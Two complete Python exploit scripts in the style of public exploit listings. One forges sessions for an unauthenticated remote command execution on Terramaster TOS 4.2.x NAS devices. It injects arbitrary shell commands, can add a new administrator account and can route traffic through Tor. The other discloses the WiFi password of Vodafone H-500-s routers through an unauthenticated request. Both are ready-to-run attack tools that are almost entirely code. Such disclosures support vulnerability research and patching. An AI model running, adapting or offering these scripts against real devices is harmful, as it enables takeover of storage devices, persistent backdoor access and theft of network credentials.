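#!/usr/bin/env python3
# Exploit Title: Terramaster TOS 4.2.15 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 12/24/2021
# Exploit Author: n0tme (thatsn0tmysite)
# Full Write-Up: https://thatsn0tmy.site/posts/2021/12/how-to-summon-rces/
# Vendor Homepage: https://www.terra-master.com/
# Version: TOS 4.2.X (4.2.15-2107141517)
# Tested on: 4.2.15, 4.2.10

import argparse
import hashlib
import json
import os
import sys
import time

import requests
import urllib3

# Filled in by main() from the unauthenticated mobile/wapNasIPS response; the
# helpers below read these module globals.
TARGET = None        # base URL, e.g. http://10.0.0.100:8181
MAC_ADDRESS = None   # "ADDR" field of wapNasIPS; its tail is the signing key
PWD = None           # "PWD" field of wapNasIPS; sent back as the authorization header
TIMESTAMP = None     # request timestamp that is signed with tos_encrypt_str


def tos_encrypt_str(toencrypt):
    """Return the TOS signature of *toencrypt*: md5 of the MAC-derived key followed by the value.

    The key is MAC_ADDRESS[6:], i.e. everything after the first six characters of
    the ADDR value. Both ADDR and PWD are handed to an unauthenticated client by
    wapNasIPS, which is what makes forging the cookies below possible.
    """
    key = MAC_ADDRESS[6:]
    return hashlib.md5(f"{key}{toencrypt}".encode("utf8")).hexdigest()


def user_session(session, username):
    """Replace the session cookies with a forged kod_name/kod_token pair for *username*.

    The token is the signature of the leaked PWD (or of the empty string for the
    built-in guest account), so no password is needed.
    """
    session.cookies.clear()
    if username == "guest":
        token = tos_encrypt_str("")
    else:
        token = tos_encrypt_str(PWD)
    session.cookies["kod_name"] = username
    session.cookies["kod_token"] = token


def fetch_file(session, path):
    """Read *path* from the NAS as guest via mobile/fileDownload and return the raw bytes.

    Raises requests.HTTPError on a non-2xx response so an error page is not
    silently returned (or written out) as if it were the file.
    """
    user_session(session, "guest")
    r = session.post(f"{TARGET}/module/api.php?mobile/fileDownload", data={"path": path})
    r.raise_for_status()
    return r.content


def download(session, path, save_as=None):
    """Download *path* from the NAS to the local file *save_as* (default: basename of *path*)."""
    filename = save_as if save_as is not None else os.path.basename(path)
    with open(filename, "wb") as file:
        file.write(fetch_file(session, path))


def get_admin_users(session):
    """Return the members of the NAS 'admin' group, parsed from its /etc/group.

    Parsed in memory rather than through a fixed /tmp file: the original wrote
    /tmp/terramaster_group, a predictable path another local user could
    pre-create or symlink, and left it behind whenever no admin group was found.
    Returns an empty list when the group is absent (the original returned None,
    which then crashed the caller's loop).
    """
    group_file = fetch_file(session, "/etc/group").decode("utf-8", errors="replace")
    for line in group_file.splitlines():
        fields = line.strip().split(':')
        if len(fields) >= 4 and fields[0] == "admin":
            return [user for user in fields[3].split(",") if user]
    return []


def main():
    """Parse arguments, harvest PWD/ADDR, then download, create an admin or run a command."""
    global TARGET, MAC_ADDRESS, PWD, TIMESTAMP

    p = argparse.ArgumentParser()
    p.add_argument(dest="target", help="Target URL (e.g. http://10.0.0.100:8181)")
    p.add_argument("--cmd", dest="cmd", help="Command to run", default="id")
    p.add_argument("-d", "--download", dest="download", help="Only download file", default=None)
    p.add_argument("-o", "--output", dest="save_as", help="Save downloaded file as", default=None)
    p.add_argument("-c", "--create", dest="create",
                   help="Only create admin user (format should be admin:password)", default=None)
    p.add_argument("--tor", dest="tor", default=False, action="store_true", help="Use TOR")
    p.add_argument("--rce", dest="rce", default=0, type=int, help="RCE to use (1 and 2 have no output)")
    args = p.parse_args()

    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    TARGET = args.target.rstrip("/")

    s = requests.Session()
    if args.tor:
        s.proxies = {"http": "socks5://127.0.0.1:9050", "https": "socks5://127.0.0.1:9050"}
    # Headers the original sends; presumably what the mobile API expects from the TNAS app.
    s.headers.update({"user-device": "TNAS", "user-agent": "TNAS"})

    # Unauthenticated information leak: wapNasIPS returns PWD and ADDR, the two
    # values every forged session and signature below is built from.
    r = s.post(f"{TARGET}/module/api.php?mobile/wapNasIPS")
    try:
        data = r.json()["data"]
        PWD = data["PWD"]
        MAC_ADDRESS = data["ADDR"]
    except (ValueError, KeyError, TypeError):
        sys.exit(f"[-] {TARGET} did not return PWD/ADDR from mobile/wapNasIPS; "
                 "not a TOS 4.2 host or not vulnerable")

    TIMESTAMP = str(int(time.time()))
    s.headers.update({"signature": tos_encrypt_str(TIMESTAMP), "timestamp": TIMESTAMP})
    s.headers.update({"authorization": PWD})

    if args.download is not None:
        download(s, args.download, save_as=args.save_as)
        sys.exit(0)

    # Three command-injection sinks in /tos/index.php; only the first echoes output.
    rces = [
        f"{TARGET}/tos/index.php?app/del&id=0&name=;{args.cmd};xx%23",
        f"{TARGET}/tos/index.php?app/hand_app&name=;{args.cmd};xx.tpk",  # BLIND
        f"{TARGET}/tos/index.php?app/app_start_stop&id=ups&start=0&name=donotcare.*.oexe;{args.cmd};xx",  # BLIND
    ]
    if not 0 <= args.rce < len(rces):
        sys.exit(f"[-] --rce must be between 0 and {len(rces) - 1}")
    if args.create is not None and ":" not in args.create:
        sys.exit("[-] --create expects username:password")

    admins = get_admin_users(s)
    if not admins:
        sys.exit("[-] Could not read the admin group from /etc/group on the target")

    for admin in admins:
        user_session(s, admin)
        if args.create is not None:
            # split once so a password containing ':' survives
            user, password = args.create.split(":", 1)
            groups = json.dumps(["allusers", "admin"])
            s.post(f"{TARGET}/module/api.php?mobile/__construct")
            r = s.post(f"{TARGET}/module/api.php?mobile/set_user_information",
                       data={"groups": groups, "username": user, "operation": "0",
                             "password": password, "capacity": ""})
            if "create user successful!" in str(r.content, "utf8"):
                print(r.content)
                break
            continue
        r = s.get(rces[args.rce])
        content = str(r.content, "utf-8")
        # A login page in the response means this admin's forged session was rejected; try the next one.
        if "<!--user login-->" not in content:
            print(content)
            sys.exit(0)


if __name__ == '__main__':
    main()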

Vodafone H-500-s 3.5.10 - WiFi Password Disclosure

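# Exploit Title: Vodafone H-500-s 3.5.10 - WiFi Password Disclosure
# Date: 01/01/2022
# Exploit Author: Daniel Monzón (stark0de)
# Vendor Homepage: https://www.vodafone.es/
# Software Link: N/A
# Version: Firmware version Vodafone-H-500-s-v3.5.10
# Hardware model: Sercomm VFH500

# The WiFi access point password gets disclosed just by performing a GET request with certain
# headers: /data/activation.json answers without any authentication when the request carries the
# pageid=129 cookie and the XMLHttpRequest/Referer headers of the activation wizard.

import json
import sys

import requests


def extract_wifi_password(entries):
    """Return the "wifi_password" value from the decoded activation.json list, or None.

    On the tested firmware the key sits in the fourth element (index 3), so that
    one is tried first; the remaining elements are scanned as a fallback in case
    the layout differs between builds. Anything that is not a list of dicts
    yields None instead of the IndexError/AttributeError the original raised.
    """
    if not isinstance(entries, list):
        return None
    candidates = []
    if len(entries) > 3:
        candidates.append(entries[3])
    candidates.extend(entries)
    for entry in candidates:
        if isinstance(entry, dict) and entry.get("wifi_password") is not None:
            return entry.get("wifi_password")
    return None


def main():
    """Request activation.json from the router given on the command line and print the WiFi key."""
    if len(sys.argv) != 2:
        print("Usage: python3 vodafone-pass-disclose.py http://IP")
        sys.exit(1)

    base = sys.argv[1].rstrip("/")
    url = base + "/data/activation.json"
    cookies = {"pageid": "129"}
    # Header names are spelled correctly here; the original sent "Accept- Language" and
    # "X-Requested- With" (with a space), which do not match the real header names.
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
        "Accept": "application/json, text/javascript, */*; q=0.01",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
        "X-Requested-With": "XMLHttpRequest",
        "Connection": "close",
        # Mimic the wizard page that normally issues this request; derived from the
        # target instead of the hard-coded 192.168.0.1 so non-default LAN addresses work.
        "Referer": base + "/activation.html?mode=basic&lang=en-es&step=129",
    }

    req = requests.get(url, headers=headers, cookies=cookies, timeout=10)
    if req.status_code != 200:
        sys.exit(f"[-] {url} returned HTTP {req.status_code}")
    try:
        entries = json.loads(req.text)
    except ValueError:
        sys.exit("[-] Response is not JSON; the device is probably not an affected H-500-s")

    result = extract_wifi_password(entries)
    if result is None:
        sys.exit("[-] No wifi_password field in the response")
    print("[+] The wifi password is: " + result)


if __name__ == "__main__":
    main()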